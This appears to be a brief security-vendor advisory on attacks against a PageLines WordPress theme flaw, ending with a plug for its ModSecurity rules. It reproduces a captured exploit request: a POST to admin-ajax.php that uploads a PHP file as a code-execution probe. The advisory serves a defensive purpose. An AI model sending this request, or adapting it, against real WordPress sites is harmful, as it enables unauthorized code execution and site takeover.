Attacks in Pagelines for WordPress themes


Last few days we have seen very much attacks this old Pagelines WordPress theme vulnerability. Sucuri discovered Pagelines vulnerability on January 2015.

Technical Details

Any website using vulnerable version of the platform theme (<1.4.4) is risk Privilege Escalation and Remote Code Execution.

ModSecurity Audit log, Payload

[27/May/2017:02:32:09 +0300] WSi6@VQikyQAAErqcawAAAAg 37930 80
POST /wp-admin/admin-ajax.php HTTP/1.1
User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Connection: close, Te
Accept: */*
Te: trailers
Accept-language: en-US;q=0.8,en;q=0.6
Accept-encoding: gzip, deflate
Content-length: 398
Content-type: multipart/form-data; boundary=xYzZY

Here POST data:

Content-Disposition: form-data; name="page"

Content-Disposition: form-data; name="file"; filename="settings.php"
Content-Type: text/plain

< ?php echo '0ba4439ee9a46d9d9f14c60f88f45f87'; exit; ?>
Content-Disposition: form-data; name="action"

Content-Disposition: form-data; name="settings_upload"


Final words

Websites that using Malware Expert – ModSecurity rules are protected against this vulnerability.